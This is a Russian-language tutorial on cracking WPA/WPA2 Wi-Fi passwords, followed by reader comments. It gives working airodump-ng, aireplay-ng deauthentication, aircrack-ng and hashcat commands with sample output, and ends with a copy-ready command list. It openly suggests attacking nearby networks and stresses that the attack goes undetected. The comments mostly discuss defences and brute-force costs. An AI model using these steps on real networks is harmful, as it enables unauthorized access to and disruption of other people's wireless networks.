Взлом маршрутизаторов WPA/WPA2 Wi-Fi с помощью Airodump-ng и Aircrack-ng/Hashcat


Это краткое пошаговое руководство, которое демонстрирует способ взлома сетей Wi-Fi, защищённых слабыми паролями. Оно не исчерпывающее, но этой информации должно хватить, чтобы вы протестировали свою собственную сетевую безопасность или взломали кого-нибудь поблизости. Изложенная ниже атака полностью пассивна (только прослушивание, ничего не транслируется с вашего компьютера) и о ней невозможно узнать, если вы только реально не воспользуетесь паролем, который взломали. Необязательную активную атаку с деаутентификацией можно применить для ускорения разведывательного процесса. Она описана в конце статьи.

Если вы знакомы с процессом, можете пропустить описания и сразу перейти к списку команд в конце. Разнообразные предложения и альтернативные методы перечислены в приложении.

ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Данное ПО/руководство предназначено только для образовательных целей. Его нельзя использовать для нелегальной активности. Автор не несёт ответственности за его использование. Не будь уродом.

Для начала


Это руководство предполагает, что вы:

  • В целом не испытываете проблем с использованием командной строки.
  • Работаете в дистрибутиве Linux на базе Debian, желательно Kali linux (пользователям OS X см. приложение).
  • У вас установлен Aircrack-ng
    • sudo apt-get install aircrack-ng
  • Ваша карта беспроводной связи поддерживает режим монитора (см. список совместимых устройств).

Взлом сети Wi-Fi


Режим монитора


Начнём со списка беспроводных интерфейсов, которые поддерживают режим монитора:

airmon-ng

Если вы не видите интерфейсов в списке, то ваша карта не поддерживает режим монитора. :(

Предположим, что название вашего интерфейса wlan0, но используйте настоящее название, если оно отличается от этого. Далее, переведём интерфейс в режим монитора:

airmon-ng start wlan0

Запускаем iwconfig. Теперь вы должны увидеть новый интерфейс монитора (скорее всего, mon0 или wlan0mon).

Найти цель


Начните прослушивать трансляцию кадров неисправности окружающих беспроводных маршрутизаторов, используя свой интерфейс монитора:

airodump-ng mon0

Вы должны увидеть примерно такую выдачу.

CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49                                         
                                                                                                                                              
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                              
 14:91:82:F7:52:EB  -66      205       26    0   1  54e  OPN              belkin.2e8.guests
 14:91:82:F7:52:E8  -64      212       56    0   1  54e  WPA2 CCMP   PSK  belkin.2e8
 14:22:DB:1A:DB:64  -81       44        7    0   1  54   WPA2 CCMP        <length:  0>
 14:22:DB:1A:DB:66  -83       48        0    0   1  54e. WPA2 CCMP   PSK  steveserro
 9C:5C:8E:C9:AB:C0  -81       19        0    0   3  54e  WPA2 CCMP   PSK  hackme
 00:23:69:AD:AF:94  -82      350        4    0   1  54e  WPA2 CCMP   PSK  Kaitlin's Awesome
 06:26:BB:75:ED:69  -84      232        0    0   1  54e. WPA2 CCMP   PSK  HH2
 78:71:9C:99:67:D0  -82      339        0    0   1  54e. WPA2 CCMP   PSK  ARRIS-67D2
 9C:34:26:9F:2E:E8  -85       40        0    0   1  54e. WPA2 CCMP   PSK  Comcast_2EEA-EXT
 BC:EE:7B:8F:48:28  -85      119       10    0   1  54e  WPA2 CCMP   PSK  root
 EC:1A:59:36:AD:CA  -86      210       28    0   1  54e  WPA2 CCMP   PSK  belkin.dca

Захват 4-стороннего рукопожатия


WPA/WPA2 использует 4-стороннее рукопожатие для аутентификации устройств в сети. Неважно, что это значит, но вам нужно захватить одно из этих рукопожатий, чтобы взломать сетевой пароль. Эти рукопожатия происходят каждый раз, когда устройства подключаются к сети, например, когда ваш сосед возвращается домой с работы. Чтобы перехватить рукопожатие, мы направляем airmon-ng для мониторинга трафика в целевой сети, используя значения канала и bssid, полученные предыдущей командой.

# replace -c and --bssid values with the values of your target network
# -w specifies the directory where we will save the packet capture
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0


 CH  6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 9C:5C:8E:C9:AB:C0  -47   0      140        0    0   6  54e  WPA2 CCMP   PSK  ASUS

Теперь мы ждём… Как только будет захвачено рукопожатие, вы должны увидеть в правом верхнем углу экрана, рядом с текущим временем что-то вроде [ WPA handshake: bc:d3:c9:ef:d2:67.

Если не терпится и вы согласны на активную атаку, то можете заставить устройства в сети заново соединиться, принудительно разъединив их. Для этого им нужно отправить вредоносные пакеты на деаутентификацию. Это часто приводит к перехвату 4-стороннего рукопожатия. См. раздел об атаке с деаутентификацией ниже.

Как только вы перехватили рукопожатие, нажмите ctrl-c для выхода из airodump-ng. Вы увидите файл .cap там, где указали airodump-ng сохранять перехваты (скорее всего, он называется -01.cap). Мы используем этот файл перехвата для взлома сетевого пароля. Я люблю менять название файла в соответствии с названием сети, которую мы будем взламывать:

mv ./-01.cap hackme.cap

Взлом пароля сети


Последний шаг — это взломать пароль, используя перехваченное рукопожатие. Если у вас есть доступ к GPU, настоятельно рекомендую использовать для взлома пароля hashcat. Я создал простой инструмент, с помощью которого использовать hashcat очень легко: он называется naive-hashcat. Если у вас нет доступа к GPU, то можно воспользоваться различными онлайновыми GPU-сервисами для взлома, вроде GPUHASH.me или OnlineHashCrack. Можете также попробовать использовать CPU-брутфорс с помощью Aircrack-ng.

Обратите внимание, что оба метода атаки ниже предполагают относительно простой пользовательский пароль. Большинство маршрутизаторов WPA/WPA2 поставляются с сильными 12-значными случайными паролями, которые большинство пользователей оставляют без изменений (и правильно делают). Если пробуете взломать один из таких паролей, рекомендую использовать словарные файлы Probable-Wordlists WPA-length.

Взлом с помощью naive-hashcat (рекомендуемый метод)
До того, как начать взлом пароля с помощью naive-hashcat, нужно конвертировать наш файл .cap в эквивалентный hashcat формат для .hccapx. Это легко сделать или загрузив файл .cap на https://hashcat.net/cap2hccapx/, или напрямую используя инструмент cap2hccapx.

cap2hccapx.bin hackme.cap hackme.hccapx

Затем скачиваем и запускаем naive-hashcat:

# download
git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat

# download the 134MB rockyou dictionary file
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

# crack ! baby ! crack !
# 2500 is the hashcat hash mode for WPA/WPA2
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh


Naive-hashcat использует различные словари, правила, комбинации и маски (умный брутфорс) для проведения атаки. Атака на пароль средней сложности может занять дни или даже месяцы. Взломанный пароль будет сохранён в hackme.pot, так что периодически проверяйте этот файл. Как только пароль взломан, то в POT_FILE вы увидите что-то такое:

e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet

Где последние два поля, разделённые : представляют собой имя сети и пароль, соответственно.

Если предпочитаете использовать hashcat без naive-hashcat, то см. эту страницу.

Взлом с Aircrack-ng
Aircrack-ng можно использовать для самых простых словарных атак силами CPU. Перед началом атаки нужно получить список слов. Рекомендую использовать известный словарный файл rockyou:

# download the 134MB rockyou dictionary file
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt


Обратите внимание, что если сетевой пароль отсутствует среди слов в файле, то вы его не взломаете.

# -a2 specifies WPA2, -b is the BSSID, -w is the wordfile
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap


Как только пароль взломан, вы увидите в окне терминала сообщение KEY FOUND!, после которого будет указан пароль в текстовом виде.

                                 Aircrack-ng 1.2 beta3


                   [00:01:49] 111040 keys tested (1017.96 k/s)


                         KEY FOUND! [ hacktheplanet ]


      Master Key     : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89 
                       59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E 

      Transient Key  : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71 
                       2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73 
                       6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78 
                       8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21 

      EAPOL HMAC     : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4

Атака с деаутентификацией


Атака с деаутентификацией предполагает отправку поддельных пакетов на деаутентификацию с вашей машины клиенту, подключенному к сети, которую вы пытаетесь взломать. Эти пакеты включают в себя поддельные адреса "sender", так что клиент думает, что они отправлены с настоящих точек доступа. Получив такой пакет, большинство клиентов отключаются от сети и немедленно переподключаются, обеспечивая вам возможность участвовать в 4-стороннем рукопожатии, если вы мониторите с помощью airodump-ng.

Используйте airodump-ng для мониторинга конкретной точки доступа (используя -c channel --bssid MAC) до тех пор, пока клиент (STATION) не подключится. Подключенный клиент выглядит примерно так, где 64:BC:0C:48:97:F7 его MAC-адрес:

 CH  6 ][ Elapsed: 2 mins ][ 2017-07-23 19:15 ]
                                                                                                                                           
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                           
 9C:5C:8E:C9:AB:C0  -19  75     1043      144   10   6  54e  WPA2 CCMP   PSK  ASUS
                                                                                                                                           
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe
                                                                                                                                           
 9C:5C:8E:C9:AB:C0  64:BC:0C:48:97:F7  -37    1e- 1e     4     6479  ASUS

Теперь оставим airodump-ng работать, а сами откроем новое окно консоли. Мы используем команду aireplay-ng для отправки пакета на деаутентификацию жертве, заставляя его переподключиться к сети, и будем надеяться на рукопожатие.

# -0 2 specifies we would like to send 2 deauth packets. Increase this number
# if need be with the risk of noticeably interrupting client network activity
# -a is the MAC of the access point
# -c is the MAC of the client
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0


Как вариант, вы можете транслировать пакеты деаутентификации всем клиентам вокруг:

# not all clients respect broadcast deauths though
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 mon0


Как только вы отправили пакеты, возвращайтесь к процессу airodump-ng, и при удачном стечении обстоятельств увидите справа вверху: [ WPA handshake: 9C:5C:8E:C9:AB:C0. Теперь вы перехватили рукопожатие и можно начинать взлом пароля сети.

Список команд


Ниже список всех команд, которые нужны для взлома сети WPA/WPA2, по порядку, с минимальным описанием.

# put your network device into monitor mode
airmon-ng start wlan0

# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0

# start listening for the handshake
airodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0

# optionally deauth a connected client to force a handshake
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

########## crack password with aircrack-ng... ##########

# download 134MB rockyou.txt dictionary file if needed
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

# crack w/ aircrack-ng
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap

########## or crack password with naive-hashcat ##########

# convert cap to hccapx
cap2hccapx.bin capture/-01.cap capture/-01.hccapx

# crack with naive-hashcat
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh


Приложение


Отзывы на это руководство были такими замечательными, что я добавил советы и дополнительные материалы от участников сообщества в дополнительное приложение. Изучите его, чтобы узнать, как:

  • Перехватывать рукопожатия и взламывать пароли WPA на MacOS/OSX
  • Перехватывать рукопожатия со всех сетей вокруг с помощью wlandump-ng
  • Использовать crunch для генерации на лету словарных списков на 100 ГБ и больше
  • Подделывать свой MAC-адрес с помощью macchanger

Авторство


Основная часть информации здесь почерпнута из великолепного руководства Льюиса Энкарнасьона. Спасибо также авторам и мейнтейнерам Aircrack-ng и Hashcat.

Огромная благодарность neal1991 за перевод этого руководства на китайский. Кроме того, благодарим hiteshnayak305, enilfodne, DrinkMoreCodeMore, hivie7510, cprogrammer1994, 0XE4, hartzell, zeeshanu, flennic, bhusang, tversteeg, gpetrousov, crowchirp и Shark0der с Reddit и GitHub, которые тоже помогли советами и исправлением опечаток. Если вам интересно узнать о дополнительных вариантах взлома WPA2, почитайте это обсуждение на Hacker News.

Комментарии (51)


  1. haiflive
    06.08.2017 07:23
    +1

    Значит ли это что если кого-то будут судить, то можно сослаться на взлом WI-FI?


  1. sawork
    06.08.2017 09:03

    Неплохая инструкция, но не хватает описания атаки на WPS, подбор пина и последующие атаки с его помощью…


    1. serg_p
      06.08.2017 13:05

      Да. Немного маловато :)


    1. chelaxe
      06.08.2017 21:09
      +1

      В журнале Хакер #158. Есть и на хабре.

      а вообще у меня в блоге был подробный разбор всех моментов и wps.



  1. FreeManOfPeace
    06.08.2017 09:03
    +6

    В общем то ничего нового, эти мануалы лежат в сети годами, и на всё уже давно написаны скрипты для школьников удобства.
    Вот если бы была более обширная статья в которой так же были рассмотрены альтернативы aircrack-ng (например взлом WPS через Reaver).

    А интереснее всего было бы почитать о запуске того же reaver/aircrack-ng на том же андроид, и про местные альтернативы им.


    1. chifram
      08.08.2017 10:33

      под windows появилось что-то стоящее по типу 19 в 1?


  1. symbol
    06.08.2017 10:03

    а как от этого защищаться, есть инструкции?


    1. MonkAlex
      06.08.2017 10:11
      +2

      Элементарные. Не использовать WPA, использовать WPA2 с несловарным паролем.


      1. Croot
        06.08.2017 11:05
        -2

        Лишним не будет настроить фильтр по MAC адресу, на тот случай если каким-то чудом пароль таки подберут.


        1. omgiafs
          06.08.2017 11:24
          +1

          Гораздо веселее накостылить скрипт который будет с помощью inotifywait мониторить файл с dhcp-leases и, если MAC не в белом списке, слать уведомление вам на почту.
          Можно, конечно, и более изящно, но это первое, что пришло мне в голову.

          Плюс такого метода — вы узнаете, что:
          — вашу сеть пытались взломать;
          — вашу сеть взломали.


          1. mkll
            06.08.2017 15:53

            arpalert


        1. chem_ua
          06.08.2017 14:36
          +8

          Фильтрация по MAC-адресу это защита от ясельной группы в детском саду.
          Подключенные MAC-адреса к роутеру, передаются в открытом виде и что помешает человеку его подменить, когда клиент будет отключен?


          1. chelaxe
            06.08.2017 21:11

            можно еще и не ждать когда он отключится, а самому его отключить) по типу «Атака с деаутентификацией» что выше.


            1. chem_ua
              06.08.2017 22:00

              Вы немного не поняли, если вы отключите клиента от точки в которой включена фильтрация по MAC-адресу, Вы все равно не подключитесь с таким же MAC-ом. А вот когда клиент отключен, например пошел спать, никто не помешает подменить MAC-адрес и подключится к точке, а дальше останется добавить свой MAC-адрес в исключения или вообще отключить фильтрацию.


              1. electronus
                06.08.2017 22:51

                Взлом пароля к вайфай не равняется взлому пароля админки роутера


                1. chem_ua
                  06.08.2017 22:57

                  Это понятно, но учитывая количество уязвимостей роутеров это не такая и большая проблема. Много людей ставят альтернативные прошивки или обновляют существующие? Я Вам отвечу, нет, очень мало.
                  И не «взлом», а подбор.


                  1. Dmitry_5
                    07.08.2017 11:52

                    Разве роутеры не научились еще в 21м веке обновлять прошивку сами?


                    1. chem_ua
                      07.08.2017 18:19

                      И много Вы таких моделей знаете?
                      Да и не факт что после обновления уязвимость будет закрыта. Учитывая как производители относятся к уведомлениям об уязвимостей у них это «фича».


                      1. chelaxe
                        07.08.2017 18:57

                        по этой причине пользуюсь микротиками… и обновления, и отношение, железо и качество, да и софт. Не зря их в народе зовут циска для бедных.


                        1. chem_ua
                          07.08.2017 19:11

                          Ну еще как вариант, взять роутер с хорошей начинкой и прошить OpenWrt.


                          1. chelaxe
                            07.08.2017 20:37

                            Могу порекомендовать UPVEL UR-337N4G. В ситилинке 1.5к стоит. Делал большую сеть на данных девайсах с 4g модемами Huawei E3372 на двух провайдерах. OpenWrt и SoftEther. Получилось крайне надежное решение.


                        1. g0rd1as
                          07.08.2017 20:22

                          То-то обычный запуск RouterScan-а выдает увесистую пачку незащищенных Микротиков! :)


                          1. chelaxe
                            07.08.2017 20:33

                            И кто в этом виноват? Настраивать нужно девайс.


                            1. Chupaka
                              10.08.2017 11:13

                              Как правило, виновата уверенность пользователя в том, что он-то роутер настроит гораздо лучше, чем тот же QuickSet с заводскими шаблонами настроек :) Поэтому сброс настроек в ноль и добавление адресов на WAN/LAN, правила NAT — и вроде уже Интернетики работают, больше ничего лучше не трогать.


      1. g0rd1as
        06.08.2017 11:39

        Ну, вот это бы на всякий случай тоже стоило прописать. А то в РФ, знаете ли, придется еще доказывать, что не верблюд, и дисклеймер сильно не поможет, если за переводчика или автора возьмутся всерьез.


        1. chelaxe
          06.08.2017 21:12

          Согласен. По этому и блог свой снес и писать на подобные темы перестал.


      1. ixtiander
        08.08.2017 13:29

        А автор разве не про влом WPA2+PSK пишет?
        9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK hackme


        1. MonkAlex
          08.08.2017 13:54

          Да, но со словарём.


    1. omgiafs
      06.08.2017 11:05

      Просто использовать 12-символьный пароль в сочетании с WPA2+PSK.

      Если и сдампят хеш, то на взлом 12-символьного пароля уйдет точно больше недели.

      Давайте прикинем. 1017 паролей в секунду ([00:01:49] 111040 keys tested (1017.96 k/s)), 87 868 800 в сутки. 12 символов это дохрениллион комбинаций. Если взять только символы латинского алфавита (строчные + прописные) и цифры, получаем (26+26+10)^12 = 839 299 365 868 340 224 вариантов, на перебор всех потребуется 26 169 133 лет. На перебор 1% комбинаций понадобится 261к лет.


      1. akirsanov
        06.08.2017 14:32

        У вас порядок цифр брута для wpa2 далек от реальности: https://www.anachakhacker.com/2016/12/05/hashcat-benchmark-wpa-wpa2-collection/


        1. akirsanov
          06.08.2017 14:37

          Добавлю еще один бенчмарк:
          https://gist.github.com/epixoip/a83d38f412b4737e99bbef804a270c40

          Hashtype: WPA/WPA2
          Speed.Dev.#*.: 3177.6 kH/s

          А это уже 3 с лишним миллиона хешей в секунду.


          1. Ghool
            08.08.2017 11:38

            Так это же в 9 тысяч лет можно уложиться!
            Дыра в безопасности *)


            1. MonkAlex
              08.08.2017 12:54
              +3

              Хоть что-то в безопасности =)


        1. chem_ua
          06.08.2017 14:38

          Не говоря уже про фермы где скорость больше нескольких миллионов хешей в секунду. Понятно что и этого мало, но перебрать быстро по словарю можно.


      1. hunroll
        06.08.2017 14:38

        Ну 1000 паролей в секунду — это если использовать процессор. Уже очень давно на хабре есть серия статей, которая не один раз помогла подобрать пароль к сети соседей, от которой забыл пароль.
        Про ривер есть тут, более чем понятно: Reaver
        Про то как использовать ГПУ: Cpyrit, OclHashcat
        На мобильной Radeon 7400 получалось около 10к паролей в секунду. На 7970 получалось, вроде, 70к паролей/секунду.
        Но да, 12 символов перебирать — пару десятков неплохих ферм нужно. Уж очень это дорого и долго получится.

        P.S. Если набросать файлик со всеми датами рождения в «нашем» формате за последние, скажем, 100 лет, то из 10 сетей хоть одна да проскочит) У меня из 20 сетей в зоне нормального покрытия у троих были даты рождения


        1. chem_ua
          06.08.2017 14:39

          Даты рождения, номера мобильных, которые быстро пробиваются по маскам.


          1. chelaxe
            06.08.2017 21:17

            просто цифры 8 штук (многие ставят пароль юзая PIN указанный на обороте роутера)

            ПРИМЕР
            image


            1. chem_ua
              06.08.2017 22:03

              Даты рождения как раз и подпадают под 8 цифр.


            1. granade18
              07.08.2017 11:16

              Pin это уже WPS


        1. senglory
          08.08.2017 13:29

          Интересно, а за какое время подберется 20 символьный пароль из одних цифр от 0 до 9?


          1. cloudness
            08.08.2017 15:49
            +1

            10^20=100000000000000000000 — столько вариантов пароль (ну очевидно же, комбинаторика, все дела, да и просто посчитать от 0 до 1 с 20 нулями можно). Поделить на количество паролей в секунду (возьмем, к примеру, 10 тысяч паролей в секунду), итого 10^16 секунд на подбор или 317 миллионов лет. Как бы надежно, но запоминать такую фигню или вводить — дело неблагодарное.


  1. runalsh
    06.08.2017 11:35

    Оставлю только одно слово — wifislax.


    1. Federika
      06.08.2017 14:38

      Недавно начала «тестить» wifi сети, wifislax для этого отличная тема


  1. chem_ua
    06.08.2017 14:51
    +3

    Хеш необратим и использовать термин «взлом» не совсем корректно, в данном случае лучше использовать термин «подбор».
    А вообще, на сайте публиковали более подробные статьи на эту тему:
    Wi-Fi сети: проникновение и защита. 1) Матчасть
    Wi-Fi сети: проникновение и защита. 2) Kali. Скрытие SSID. MAC-фильтрация. WPS
    Wi-Fi сети: проникновение и защита. 3) WPA. OpenCL/CUDA. Статистика подбора



  1. konchok
    06.08.2017 22:07
    -2

    >кадров неисправности
    >четырехстороннее рукопожатие

    Нетрадиционный перевод прямо скажем.


  1. VBKesha
    07.08.2017 16:45

    Как вариант, вы можете транслировать пакеты деаутентификации всем клиентам вокруг

    Как долго идет процесс повторной аутентификации в таком случае?


    1. semen-pro
      07.08.2017 22:55

      Если рассылать массово пакеты деаутентификации — все начинают проклинать того «школьника», т.к. вайфай падает, и пользоваться им невозможно. Пишут, что это первый признак попытки взлома.


  1. ivanius
    09.08.2017 08:22
    +2

    поменял соседям пароли с 88888888 и mykievstar123 на хороший рандом, пошел выдал распечатку и плучил + в карму.


  1. Machine79
    10.08.2017 11:12

    Это тоже самое Перехват паролей?